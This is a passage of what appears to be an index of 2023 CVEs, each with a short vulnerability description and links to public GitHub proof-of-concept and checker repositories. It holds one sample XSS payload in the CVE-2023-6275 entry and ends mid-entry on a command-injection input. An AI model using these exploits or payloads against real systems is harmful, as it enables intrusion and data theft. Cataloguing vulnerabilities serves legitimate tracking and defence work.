upload_post_image() function in versions up to, and including, 1.24.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. + + +- [E1A/CVE-2023-4596](https://github.com/E1A/CVE-2023-4596) +- [X-Projetion/CVE-2023-4596-Vulnerable-Exploit-and-Checker-Version](https://github.com/X-Projetion/CVE-2023-4596-Vulnerable-Exploit-and-Checker-Version) +- [X-Projetion/CVE-2023-4596-OpenSSH-Multi-Checker](https://github.com/X-Projetion/CVE-2023-4596-OpenSSH-Multi-Checker) + +### CVE-2023-4622 (2023-09-06) + +A use-after-free vulnerability in the Linux kernel's af_unix component can be exploited to achieve local privilege escalation.\n\nThe unix_stream_sendpage() function tries to add data to the last skb in the peer's recv queue without locking the queue. Thus there is a race where unix_stream_sendpage() could access an skb locklessly that is being released by garbage collection, resulting in use-after-free.\n\nWe recommend upgrading past commit 790c2f9d15b594350ae9bca7b236f2b1859de02c.\n\n + + +- [0range1337/CVE-CVE-2023-4622](https://github.com/0range1337/CVE-CVE-2023-4622) + +### CVE-2023-4631 (2023-09-25) + +The DoLogin Security WordPress plugin before 3.7 uses headers such as the X-Forwarded-For to retrieve the IP address of the request, which could lead to IP spoofing. + + +- [b0marek/CVE-2023-4631](https://github.com/b0marek/CVE-2023-4631) + +### CVE-2023-4634 (2023-09-06) + +The Media Library Assistant plugin for WordPress is vulnerable to Local File Inclusion and Remote Code Execution in versions up to, and including, 3.09. This is due to insufficient controls on file paths being supplied to the 'mla_stream_file' parameter from the ~/includes/mla-stream-image.php file, where images are processed via Imagick(). This makes it possible for unauthenticated attackers to supply files via FTP that will make directory lists, local file inclusion, and remote code execution possible. + + +- [Patrowl/CVE-2023-4634](https://github.com/Patrowl/CVE-2023-4634) + +### CVE-2023-4636 (2023-09-05) + +The WordPress File Sharing Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in versions up to, and including, 2.0.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + + +- [ThatNotEasy/CVE-2023-4636](https://github.com/ThatNotEasy/CVE-2023-4636) + +### CVE-2023-4683 (2023-08-31) + +NULL Pointer Dereference in GitHub repository gpac/gpac prior to 2.3-DEV. + + +- [Songg45/CVE-2023-4683-Test](https://github.com/Songg45/CVE-2023-4683-Test) + +### CVE-2023-4696 (2023-09-01) + +Improper Access Control in GitHub repository usememos/memos prior to 0.13.2. + + +- [mnqazi/CVE-2023-4696](https://github.com/mnqazi/CVE-2023-4696) + +### CVE-2023-4698 (2023-09-01) + +Improper Input Validation in GitHub repository usememos/memos prior to 0.13.2. + + +- [mnqazi/CVE-2023-4698](https://github.com/mnqazi/CVE-2023-4698) + +### CVE-2023-4699 (2023-11-06) + +Missing Authentication for Critical Function vulnerability in Mitsubishi Electric Corporation MELSEC-F Series CPU modules, MELSEC iQ-F Series, MELSEC iQ-R series CPU modules, MELSEC iQ-R series, MELSEC iQ-L series, MELSEC Q series, MELSEC-L series, Mitsubishi Electric CNC M800V/M80V series, Mitsubishi Electric CNC M800/M80/E80 series and Mitsubishi Electric CNC M700V/M70V/E70 series allows a remote unauthenticated attacker to execute arbitrary commands by sending specific packets to the affected products. This could lead to disclose or tamper with information by reading or writing control programs, or cause a denial-of-service (DoS) condition on the products by resetting the memory contents of the products to factory settings or resetting the products remotely. + + +- [Scottzxor/Citrix-Bleed-Buffer-Overread-Demo](https://github.com/Scottzxor/Citrix-Bleed-Buffer-Overread-Demo) + +### CVE-2023-4741 (2023-09-03) + +In IBOS OA 4.5.5 wurde eine kritische Schwachstelle gefunden. Es geht um eine nicht näher bekannte Funktion der Datei ?r=diary/default/del der Komponente Delete Logs Handler. Durch das Manipulieren mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung. + + +- [wudidike/CVE-2023-4741](https://github.com/wudidike/CVE-2023-4741) + +### CVE-2023-4762 (2023-09-05) + +Type Confusion in V8 in Google Chrome prior to 116.0.5845.179 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: High) + + +- [buptsb/CVE-2023-4762](https://github.com/buptsb/CVE-2023-4762) +- [sherlocksecurity/CVE-2023-4762-Code-Review](https://github.com/sherlocksecurity/CVE-2023-4762-Code-Review) + +### CVE-2023-4771 (2023-11-16) + +A Cross-Site scripting vulnerability has been found in CKSource CKEditor affecting versions 4.15.1 and earlier. An attacker could send malicious javascript code through the /ckeditor/samples/old/ajax.html file and retrieve an authorized user's information. + + +- [sahar042/CVE-2023-4771](https://github.com/sahar042/CVE-2023-4771) + +### CVE-2023-4800 (2023-10-16) + +The DoLogin Security WordPress plugin before 3.7.1 does not restrict the access of a widget that shows the IPs of failed logins to low privileged users. + + +- [b0marek/CVE-2023-4800](https://github.com/b0marek/CVE-2023-4800) + +### CVE-2023-4813 (2023-09-12) + +A flaw was found in glibc. In an uncommon situation, the gaih_inet function may use memory that has been freed, resulting in an application crash. This issue is only exploitable when the getaddrinfo function is called and the hosts database in /etc/nsswitch.conf is configured with SUCCESS=continue or SUCCESS=merge. + + +- [tnishiox/cve-2023-4813](https://github.com/tnishiox/cve-2023-4813) + +### CVE-2023-4863 (2023-09-12) + +Heap buffer overflow in libwebp in Google Chrome prior to 116.0.5845.187 and libwebp 1.3.2 allowed a remote attacker to perform an out of bounds memory write via a crafted HTML page. (Chromium security severity: Critical) + + +- [mistymntncop/CVE-2023-4863](https://github.com/mistymntncop/CVE-2023-4863) +- [bbaranoff/CVE-2023-4863](https://github.com/bbaranoff/CVE-2023-4863) +- [talbeerysec/BAD-WEBP-CVE-2023-4863](https://github.com/talbeerysec/BAD-WEBP-CVE-2023-4863) +- [OITApps/Find-VulnerableElectronVersion](https://github.com/OITApps/Find-VulnerableElectronVersion) +- [GTGalaxi/ElectronVulnerableVersion](https://github.com/GTGalaxi/ElectronVulnerableVersion) +- [murphysecurity/libwebp-checker](https://github.com/murphysecurity/libwebp-checker) +- [huiwen-yayaya/CVE-2023-4863](https://github.com/huiwen-yayaya/CVE-2023-4863) +- [LiveOverflow/webp-CVE-2023-4863](https://github.com/LiveOverflow/webp-CVE-2023-4863) +- [caoweiquan322/NotEnough](https://github.com/caoweiquan322/NotEnough) +- [CrackerCat/CVE-2023-4863-](https://github.com/CrackerCat/CVE-2023-4863-) +- [sarsaeroth/CVE-2023-4863-POC](https://github.com/sarsaeroth/CVE-2023-4863-POC) + +### CVE-2023-4911 (2023-10-03) + +A buffer overflow was discovered in the GNU C Library's dynamic loader ld.so while processing the GLIBC_TUNABLES environment variable. This issue could allow a local attacker to use maliciously crafted GLIBC_TUNABLES environment variables when launching binaries with SUID permission to execute code with elevated privileges. + + +- [Green-Avocado/CVE-2023-4911](https://github.com/Green-Avocado/CVE-2023-4911) +- [leesh3288/CVE-2023-4911](https://github.com/leesh3288/CVE-2023-4911) +- [RickdeJager/CVE-2023-4911](https://github.com/RickdeJager/CVE-2023-4911) +- [xiaoQ1z/CVE-2023-4911](https://github.com/xiaoQ1z/CVE-2023-4911) +- [silent6trinity/looney-tuneables](https://github.com/silent6trinity/looney-tuneables) +- [hadrian3689/looney-tunables-CVE-2023-4911](https://github.com/hadrian3689/looney-tunables-CVE-2023-4911) +- [ruycr4ft/CVE-2023-4911](https://github.com/ruycr4ft/CVE-2023-4911) +- [guffre/CVE-2023-4911](https://github.com/guffre/CVE-2023-4911) +- [chaudharyarjun/LooneyPwner](https://github.com/chaudharyarjun/LooneyPwner) +- [KernelKrise/CVE-2023-4911](https://github.com/KernelKrise/CVE-2023-4911) +- [Diego-AltF4/CVE-2023-4911](https://github.com/Diego-AltF4/CVE-2023-4911) +- [teraGL/looneyCVE](https://github.com/teraGL/looneyCVE) +- [snurkeburk/Looney-Tunables](https://github.com/snurkeburk/Looney-Tunables) +- [puckiestyle/CVE-2023-4911](https://github.com/puckiestyle/CVE-2023-4911) +- [yanfernandess/Looney-Tunables-CVE-2023-4911](https://github.com/yanfernandess/Looney-Tunables-CVE-2023-4911) +- [NishanthAnand21/CVE-2023-4911-PoC](https://github.com/NishanthAnand21/CVE-2023-4911-PoC) + +### CVE-2023-4966 (2023-10-10) + +Sensitive information disclosure in NetScaler ADC and NetScaler Gateway when configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA  virtual server. \n\n\n\n + + +- [Chocapikk/CVE-2023-4966](https://github.com/Chocapikk/CVE-2023-4966) +- [dinosn/citrix_cve-2023-4966](https://github.com/dinosn/citrix_cve-2023-4966) +- [senpaisamp/Netscaler-CVE-2023-4966-POC](https://github.com/senpaisamp/Netscaler-CVE-2023-4966-POC) +- [mlynchcogent/CVE-2023-4966-POC](https://github.com/mlynchcogent/CVE-2023-4966-POC) +- [IceBreakerCode/CVE-2023-4966](https://github.com/IceBreakerCode/CVE-2023-4966) +- [0xKayala/CVE-2023-4966](https://github.com/0xKayala/CVE-2023-4966) +- [certat/citrix-logchecker](https://github.com/certat/citrix-logchecker) +- [RevoltSecurities/CVE-2023-4966](https://github.com/RevoltSecurities/CVE-2023-4966) +- [s-bt/CVE-2023-4966](https://github.com/s-bt/CVE-2023-4966) +- [byte4RR4Y/CVE-2023-4966](https://github.com/byte4RR4Y/CVE-2023-4966) +- [jmussmann/cve-2023-4966-iocs](https://github.com/jmussmann/cve-2023-4966-iocs) +- [morganwdavis/overread](https://github.com/morganwdavis/overread) +- [LucasOneZ/CVE-2023-4966](https://github.com/LucasOneZ/CVE-2023-4966) + +### CVE-2023-5024 (2023-09-17) + +Es wurde eine Schwachstelle in Planno 23.04.04 ausgemacht. Sie wurde als problematisch eingestuft. Es betrifft eine unbekannte Funktion der Komponente Comment Handler. Durch Beeinflussen mit unbekannten Daten kann eine cross site scripting-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung. + + +- [PH03N1XSP/CVE-2023-5024](https://github.com/PH03N1XSP/CVE-2023-5024) + +### CVE-2023-5043 (2023-10-25) + +Ingress nginx annotation injection causes arbitrary command execution.\n + + +- [r0binak/CVE-2023-5043](https://github.com/r0binak/CVE-2023-5043) + +### CVE-2023-5044 (2023-10-25) + +Code injection via nginx.ingress.kubernetes.io/permanent-redirect annotation.\n + + +- [r0binak/CVE-2023-5044](https://github.com/r0binak/CVE-2023-5044) +- [4ARMED/cve-2023-5044](https://github.com/4ARMED/cve-2023-5044) +- [KubernetesBachelor/CVE-2023-5044](https://github.com/KubernetesBachelor/CVE-2023-5044) + +### CVE-2023-5070 (2023-10-20) + +The Social Media Share Buttons & Social Sharing Icons plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 2.8.5 via the sfsi_save_export function. This can allow subscribers to export plugin settings that include social media authentication tokens and secrets as well as app passwords. + + +- [RandomRobbieBF/CVE-2023-5070](https://github.com/RandomRobbieBF/CVE-2023-5070) + +### CVE-2023-5089 (2023-10-16) + +The Defender Security WordPress plugin before 4.1.0 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the login page, even when the hide login page functionality of the plugin is enabled. + + +- [Cappricio-Securities/CVE-2023-5089](https://github.com/Cappricio-Securities/CVE-2023-5089) + +### CVE-2023-5142 (2023-09-24) + +In H3C GR-1100-P, GR-1108-P, GR-1200W, GR-1800AX, GR-2200, GR-3200, GR-5200, GR-8300, ER2100n, ER2200G2, ER3200G2, ER3260G2, ER5100G2, ER5200G2 and ER6300G2 bis 20230908 wurde eine Schwachstelle entdeckt. Sie wurde als problematisch eingestuft. Dabei geht es um eine nicht genauer bekannte Funktion der Datei /userLogin.asp der Komponente Config File Handler. Durch das Beeinflussen mit unbekannten Daten kann eine path traversal-Schwachstelle ausgenutzt werden. Die Umsetzung des Angriffs kann dabei über das Netzwerk erfolgen. Die Komplexität eines Angriffs ist eher hoch. Das Ausnutzen gilt als schwierig. Der Exploit steht zur öffentlichen Verfügung. + + +- [kuangxiaotu/CVE-H3C-Report](https://github.com/kuangxiaotu/CVE-H3C-Report) + +### CVE-2023-5178 (2023-11-01) + +A use-after-free vulnerability was found in drivers/nvme/target/tcp.c` in `nvmet_tcp_free_crypto` due to a logical bug in the NVMe/TCP subsystem in the Linux kernel. This issue may allow a malicious user to cause a use-after-free and double-free problem, which may permit remote code execution or lead to local privilege escalation. + + +- [rockrid3r/CVE-2023-5178](https://github.com/rockrid3r/CVE-2023-5178) + +### CVE-2023-5204 (2023-10-19) + +The ChatBot plugin for WordPress is vulnerable to SQL Injection via the $strid parameter in versions up to, and including, 4.8.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + + +- [RandomRobbieBF/CVE-2023-5204](https://github.com/RandomRobbieBF/CVE-2023-5204) + +### CVE-2023-5217 (2023-09-28) + +Heap buffer overflow in vp8 encoding in libvpx in Google Chrome prior to 117.0.5938.132 and libvpx 1.13.1 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) + + +- [UT-Security/cve-2023-5217-poc](https://github.com/UT-Security/cve-2023-5217-poc) +- [Trinadh465/platform_external_libvpx_v1.8.0_CVE-2023-5217](https://github.com/Trinadh465/platform_external_libvpx_v1.8.0_CVE-2023-5217) +- [Trinadh465/platform_external_libvpx_v1.4.0_CVE-2023-5217](https://github.com/Trinadh465/platform_external_libvpx_v1.4.0_CVE-2023-5217) + +### CVE-2023-5324 (2023-10-01) + +In eeroOS bis 6.16.4-11 wurde eine kritische Schwachstelle gefunden. Hierbei betrifft es unbekannten Programmcode der Komponente Ethernet Interface. Durch die Manipulation mit unbekannten Daten kann eine denial of service-Schwachstelle ausgenutzt werden. Umgesetzt werden kann der Angriff im lokalen Netzwerk. Der Exploit steht zur öffentlichen Verfügung. + + +- [nomis/eero-zero-length-ipv6-options-header-dos](https://github.com/nomis/eero-zero-length-ipv6-options-header-dos) + +### CVE-2023-5360 (2023-10-31) + +The Royal Elementor Addons and Templates WordPress plugin before 1.3.79 does not properly validate uploaded files, which could allow unauthenticated users to upload arbitrary files, such as PHP and achieve RCE. + + +- [sagsooz/CVE-2023-5360](https://github.com/sagsooz/CVE-2023-5360) +- [phankz/Worpress-CVE-2023-5360](https://github.com/phankz/Worpress-CVE-2023-5360) +- [nastar-id/CVE-2023-5360](https://github.com/nastar-id/CVE-2023-5360) +- [Chocapikk/CVE-2023-5360](https://github.com/Chocapikk/CVE-2023-5360) +- [tucommenceapousser/CVE-2023-5360](https://github.com/tucommenceapousser/CVE-2023-5360) +- [Jenderal92/WP-CVE-2023-5360](https://github.com/Jenderal92/WP-CVE-2023-5360) +- [Pushkarup/CVE-2023-5360](https://github.com/Pushkarup/CVE-2023-5360) +- [angkerithhack001/CVE-2023-5360-PoC](https://github.com/angkerithhack001/CVE-2023-5360-PoC) + +### CVE-2023-5412 (2023-10-31) + +The Image horizontal reel scroll slideshow plugin for WordPress is vulnerable to SQL Injection via the plugin's shortcode in versions up to, and including, 13.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with subscriber-level and above permissions to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + + +- [RandomRobbieBF/CVE-2023-5412](https://github.com/RandomRobbieBF/CVE-2023-5412) + +### CVE-2023-5521 (2023-10-11) + +Incorrect Authorization in GitHub repository tiann/kernelsu prior to v0.6.9. + + +- [Ylarod/CVE-2023-5521](https://github.com/Ylarod/CVE-2023-5521) + +### CVE-2023-5538 (2023-10-18) + +The MpOperationLogs plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the IP Request Headers in versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + + +- [juweihuitao/MpOperationLogs](https://github.com/juweihuitao/MpOperationLogs) + +### CVE-2023-5539 (2023-11-09) + +A remote code execution risk was identified in the Lesson activity. By default this was only available to teachers and managers. + + +- [cli-ish/CVE-2023-5539](https://github.com/cli-ish/CVE-2023-5539) + +### CVE-2023-5540 (2023-11-09) + +A remote code execution risk was identified in the IMSCP activity. By default this was only available to teachers and managers. + + +- [cli-ish/CVE-2023-5540](https://github.com/cli-ish/CVE-2023-5540) + +### CVE-2023-5546 (2023-11-09) + +ID numbers displayed in the quiz grading report required additional sanitizing to prevent a stored XSS risk. + + +- [obelia01/CVE-2023-5546](https://github.com/obelia01/CVE-2023-5546) + +### CVE-2023-5561 (2023-10-16) + +WordPress does not properly restrict which user fields are searchable via the REST API, allowing unauthenticated attackers to discern the email addresses of users who have published public posts on an affected website via an Oracle style attack + + +- [pog007/CVE-2023-5561-PoC](https://github.com/pog007/CVE-2023-5561-PoC) + +### CVE-2023-5717 (2023-10-25) + +A heap out-of-bounds write vulnerability in the Linux kernel's Linux Kernel Performance Events (perf) component can be exploited to achieve local privilege escalation.\n\nIf perf_read_group() is called while an event's sibling_list is smaller than its child's sibling_list, it can increment or write to memory locations outside of the allocated buffer.\n\nWe recommend upgrading past commit 32671e3799ca2e4590773fd0e63aaa4229e50c06.\n\n + + +- [uthrasri/CVE-2023-5717](https://github.com/uthrasri/CVE-2023-5717) + +### CVE-2023-5720 (2023-11-15) + +A flaw was found in Quarkus, where it does not properly sanitize artifacts created using the Gradle plugin, allowing certain build system information to remain. This flaw allows an attacker to access potentially sensitive information from the build system within the application. + + +- [miguelc49/CVE-2023-5720-2](https://github.com/miguelc49/CVE-2023-5720-2) +- [miguelc49/CVE-2023-5720-1](https://github.com/miguelc49/CVE-2023-5720-1) +- [miguelc49/CVE-2023-5720-3](https://github.com/miguelc49/CVE-2023-5720-3) + +### CVE-2023-5808 (2023-12-04) + +SMU versions prior to 14.8.7825.01 are susceptible to unintended information disclosure, through URL manipulation. Authenticated users in a Storage administrative role are able to access HNAS configuration backup and diagnostic data, that would normally be barred to that specific administrative role. + + +- [Arszilla/CVE-2023-5808](https://github.com/Arszilla/CVE-2023-5808) + +### CVE-2023-5961 (2023-12-23) + +A Cross-Site Request Forgery (CSRF) vulnerability has been identified in ioLogik E1200 Series firmware versions v3.3 and prior. An attacker can exploit this vulnerability to trick a client into making an unintentional request to the web server, which will be treated as an authentic request. This vulnerability may lead an attacker to perform operations on behalf of the victimized user.\n\n + + +- [HadessCS/CVE-2023-5961](https://github.com/HadessCS/CVE-2023-5961) + +### CVE-2023-5965 (2023-11-30) + +An authenticated privileged attacker could upload a specially crafted zip to the EspoCRM server in version 7.2.5, via the update form, which could lead to arbitrary PHP code execution. + + +- [pedrojosenavasperez/cve-2023-5965](https://github.com/pedrojosenavasperez/cve-2023-5965) + +### CVE-2023-5966 (2023-11-30) + +An authenticated privileged attacker could upload a specially crafted zip to the EspoCRM server in version 7.2.5, via the extension deployment form, which could lead to arbitrary PHP code execution. + + +- [pedrojosenavasperez/cve-2023-5966](https://github.com/pedrojosenavasperez/cve-2023-5966) + +### CVE-2023-6000 (2024-01-01) + +The Popup Builder WordPress plugin before 4.2.3 does not prevent simple visitors from updating existing popups, and injecting raw JavaScript in them, which could lead to Stored XSS attacks. + + +- [RonF98/CVE-2023-6000-POC](https://github.com/RonF98/CVE-2023-6000-POC) + +### CVE-2023-6019 (2023-11-16) + +A command injection existed in Ray's cpu_profile URL parameter allowing attackers to execute os commands on the system running the ray dashboard remotely without authentication. The issue is fixed in version 2.8.1+. Ray maintainers' response can be found here: https://www.anyscale.com/blog/update-on-ray-cves-cve-2023-6019-cve-2023-6020-cve-2023-6021-cve-2023-48022-cve-2023-48023 + + +- [FireWolfWang/CVE-2023-6019](https://github.com/FireWolfWang/CVE-2023-6019) +- [miguelc49/CVE-2023-6019-2](https://github.com/miguelc49/CVE-2023-6019-2) +- [miguelc49/CVE-2023-6019-1](https://github.com/miguelc49/CVE-2023-6019-1) +- [miguelc49/CVE-2023-6019-3](https://github.com/miguelc49/CVE-2023-6019-3) +- [Clydeston/CVE-2023-6019](https://github.com/Clydeston/CVE-2023-6019) + +### CVE-2023-6036 (2024-02-12) + +The Web3 WordPress plugin before 3.0.0 is vulnerable to an authentication bypass due to incorrect authentication checking in the login flow in functions 'handle_auth_request' and 'hadle_login_request'. This makes it possible for non authenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the username. + + +- [pctripsesp/CVE-2023-6036](https://github.com/pctripsesp/CVE-2023-6036) + +### CVE-2023-6063 (2023-12-04) + +The WP Fastest Cache WordPress plugin before 1.2.2 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users. + + +- [motikan2010/CVE-2023-6063-PoC](https://github.com/motikan2010/CVE-2023-6063-PoC) +- [hackersroot/CVE-2023-6063-PoC](https://github.com/hackersroot/CVE-2023-6063-PoC) +- [thesafdari/CVE-2023-6063](https://github.com/thesafdari/CVE-2023-6063) + +### CVE-2023-6241 (2024-03-04) + +Use After Free vulnerability in Arm Ltd Midgard GPU Kernel Driver, Arm Ltd Bifrost GPU Kernel Driver, Arm Ltd Valhall GPU Kernel Driver, Arm Ltd Arm 5th Gen GPU Architecture Kernel Driver allows a local non-privileged user to exploit a software race condition to perform improper memory processing operations. If the system’s memory is carefully prepared by the user, then this in turn cause a use-after-free.This issue affects Midgard GPU Kernel Driver: from r13p0 through r32p0; Bifrost GPU Kernel Driver: from r11p0 through r25p0; Valhall GPU Kernel Driver: from r19p0 through r25p0, from r29p0 through r46p0; Arm 5th Gen GPU Architecture Kernel Driver: from r41p0 through r46p0.\n\n + + +- [s1204IT/CVE-2023-6241](https://github.com/s1204IT/CVE-2023-6241) + +### CVE-2023-6246 (2024-01-31) + +A heap-based buffer overflow was found in the __vsyslog_internal function of the glibc library. This function is called by the syslog and vsyslog functions. This issue occurs when the openlog function was not called, or called with the ident argument set to NULL, and the program name (the basename of argv[0]) is bigger than 1024 bytes, resulting in an application crash or local privilege escalation. This issue affects glibc 2.36 and newer. + + +- [elpe-pinillo/CVE-2023-6246](https://github.com/elpe-pinillo/CVE-2023-6246) + +### CVE-2023-6275 (2023-11-24) + +Eine problematische Schwachstelle wurde in TOTVS Fluig Platform 1.6.x/1.7.x/1.8.0/1.8.1 ausgemacht. Hierbei geht es um eine nicht exakt ausgemachte Funktion der Datei /mobileredir/openApp.jsp der Komponente mobileredir. Dank Manipulation des Arguments redirectUrl/user mit der Eingabe "><script>alert(document.domain)</script> mit unbekannten Daten kann eine cross site scripting-Schwachstelle ausgenutzt werden. Umgesetzt werden kann der Angriff über das Netzwerk. Der Exploit steht zur öffentlichen Verfügung. Ein Aktualisieren auf die Version 1.7.1-231128, 1.8.0-231127 and 1.8.1-231127 vermag dieses Problem zu lösen. Als bestmögliche Massnahme wird das Einspielen eines Upgrades empfohlen. + + +- [erickfernandox/CVE-2023-6275](https://github.com/erickfernandox/CVE-2023-6275) + +### CVE-2023-6289 (2023-12-18) + +The Swift Performance Lite WordPress plugin before 2.3.6.15 does not prevent users from exporting the plugin's settings, which may include sensitive information such as Cloudflare API tokens. + + +- [RandomRobbieBF/CVE-2023-6289](https://github.com/RandomRobbieBF/CVE-2023-6289) + +### CVE-2023-6319 (2024-04-09) + +A command injection vulnerability exists in the getAudioMetadata method from the com.webos.service.attachedstoragemanager service on webOS version 4 through 7. A series of specially crafted requests can lead to command execution as the root user. An attacker can make authenticated requests to trigger this vulnerability.\n\n * webOS 4.9.7 - 5.30.40 running on LG43UM7000PLA \n\n * webOS 5.5.0 - 04.50.51 running on OLED55CXPUA \n\n * webOS 6.3.3-442 (kisscurl-kinglake) - 03.36.50 running on OLED48C1PUB \n\n * webOS 7.3.1-43 (mullet-mebin) - 03.33.85 running on OLED55A23LA\n\n + + +- [illixion/root-my-webos-tv](https://github.com/illixion/root-my-webos-tv) + +### CVE-2023-6350 (2023-11-29) + +Use after free in libavif in Google Chrome prior to 119.0.6045.199 allowed a remote attacker to potentially exploit heap corruption via a crafted avif file. (Chromium security severity: High) + + +- [dywsy21/CVE-2023-6350_Reproduction](https://github.com/dywsy21/CVE-2023-6350_Reproduction) + +### CVE-2023-6421 (2024-01-01) + +The Download Manager WordPress plugin before 3.2.83 does not protect file download's passwords, leaking it upon receiving an invalid one. + + +- [RandomRobbieBF/CVE-2023-6421](https://github.com/RandomRobbieBF/CVE-2023-6421) + +### CVE-2023-6444 (2024-03-11) + +The Seriously Simple Podcasting WordPress plugin before 3.0.0 discloses the Podcast owner's email address (which by default is the admin email address) via an unauthenticated crafted request. + + +- [Wayne-Ker/CVE-2023-6444-POC](https://github.com/Wayne-Ker/CVE-2023-6444-POC) + +### CVE-2023-6538 (2023-12-11) + +SMU versions prior to 14.8.7825.01 are susceptible to unintended information disclosure, through URL manipulation. Authenticated users in Storage, Server or combined Server+Storage administrative roles are able to access SMU configuration backup, that would normally be barred to those specific administrative roles. + + +- [Arszilla/CVE-2023-6538](https://github.com/Arszilla/CVE-2023-6538) + +### CVE-2023-6553 (2023-12-15) + +The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.3.7 via the /includes/backup-heart.php file. This is due to an attacker being able to control the values passed to an include, and subsequently leverage that to achieve remote code execution. This makes it possible for unauthenticated attackers to easily execute code on the server. + + +- [Chocapikk/CVE-2023-6553](https://github.com/Chocapikk/CVE-2023-6553) +- [motikan2010/CVE-2023-6553-PoC](https://github.com/motikan2010/CVE-2023-6553-PoC) +- [kiddenta/CVE-2023-6553](https://github.com/kiddenta/CVE-2023-6553) +- [cc3305/CVE-2023-6553](https://github.com/cc3305/CVE-2023-6553) +- [Harshit-Mashru/CVE-2023-6553](https://github.com/Harshit-Mashru/CVE-2023-6553) + +### CVE-2023-6567 (2024-01-11) + +The LearnPress plugin for WordPress is vulnerable to time-based SQL Injection via the ‘order_by’ parameter in all versions up to, and including, 4.2.5.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + + +- [mimiloveexe/CVE-2023-6567-poc](https://github.com/mimiloveexe/CVE-2023-6567-poc) + +### CVE-2023-6595 (2023-12-14) + +In WhatsUp Gold versions released before 2023.1, an API endpoint was found to be missing an authentication mechanism. It is possible for an unauthenticated attacker to enumerate ancillary credential information stored within WhatsUp Gold. + + +- [sharmashreejaa/CVE-2023-6595](https://github.com/sharmashreejaa/CVE-2023-6595) + +### CVE-2023-6634 (2024-01-11) + +The LearnPress plugin for WordPress is vulnerable to Command Injection in all versions up to, and including, 4.2.5.7 via the get_content function. This is due to the plugin making use of the call_user_func function with user input. This makes it possible for unauthenticated attackers to execute any public function with one parameter, which could result in remote code execution. + + +- [krn966/CVE-2023-6634](https://github.com/krn966/CVE-2023-6634) + +### CVE-2023-6654 (2023-12-10) + +In PHPEMS 6.x/7.x/8.x/9.0 wurde eine kritische Schwachstelle entdeckt. Betroffen ist eine unbekannte Verarbeitung in der Bibliothek lib/session.cls.php der Komponente Session Data Handler. Dank der Manipulation mit unbekannten Daten kann eine deserialization-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk passieren. Der Exploit steht zur öffentlichen Verfügung. + + +- [qfmy1024/CVE-2023-6654](https://github.com/qfmy1024/CVE-2023-6654) + +### CVE-2023-6661 +- [cli-ish/CVE-2023-6661](https://github.com/cli-ish/CVE-2023-6661) + +### CVE-2023-6663 +- [cli-ish/CVE-2023-6663](https://github.com/cli-ish/CVE-2023-6663) + +### CVE-2023-6700 (2024-02-05) + +The Cookie Information | Free GDPR Consent Solution plugin for WordPress is vulnerable to arbitrary option updates due to a missing capability check on its AJAX request handler in versions up to, and including, 2.0.22. This makes it possible for authenticated attackers, with subscriber-level access or higher, to edit arbitrary site options which can be used to create administrator accounts. + + +- [RandomRobbieBF/CVE-2023-6700](https://github.com/RandomRobbieBF/CVE-2023-6700) + +### CVE-2023-6702 (2023-12-14) + +Type confusion in V8 in Google Chrome prior to 120.0.6099.109 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) + + +- [kaist-hacking/CVE-2023-6702](https://github.com/kaist-hacking/CVE-2023-6702) + +### CVE-2023-6710 (2023-12-12) + +A flaw was found in the mod_proxy_cluster in the Apache server. This issue may allow a malicious user to add a script in the 'alias' parameter in the URL to trigger the stored cross-site scripting (XSS) vulnerability. By adding a script on the alias parameter on the URL, it adds a new virtual host and adds the script to the cluster-manager page. + + +- [DedSec-47/Metasploit-Exploits-CVE-2023-6710](https://github.com/DedSec-47/Metasploit-Exploits-CVE-2023-6710) +- [DedSec-47/CVE-2023-6710](https://github.com/DedSec-47/CVE-2023-6710) + +### CVE-2023-6875 (2024-01-11) + +The POST SMTP Mailer – Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a type juggling issue on the connect-app REST endpoint in all versions up to, and including, 2.8.7. This makes it possible for unauthenticated attackers to reset the API key used to authenticate to the mailer and view logs, including password reset emails, allowing site takeover. + + +- [UlyssesSaicha/CVE-2023-6875](https://github.com/UlyssesSaicha/CVE-2023-6875) +- [gbrsh/CVE-2023-6875](https://github.com/gbrsh/CVE-2023-6875) +- [hatlesswizard/CVE-2023-6875](https://github.com/hatlesswizard/CVE-2023-6875) + +### CVE-2023-6895 (2023-12-17) + +In Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK) wurde eine Schwachstelle ausgemacht. Sie wurde als kritisch eingestuft. Hierbei betrifft es unbekannten Programmcode der Datei /php/ping.php. Mittels Manipulieren des Arguments jsondata[ip] mit der Eingabe netstat 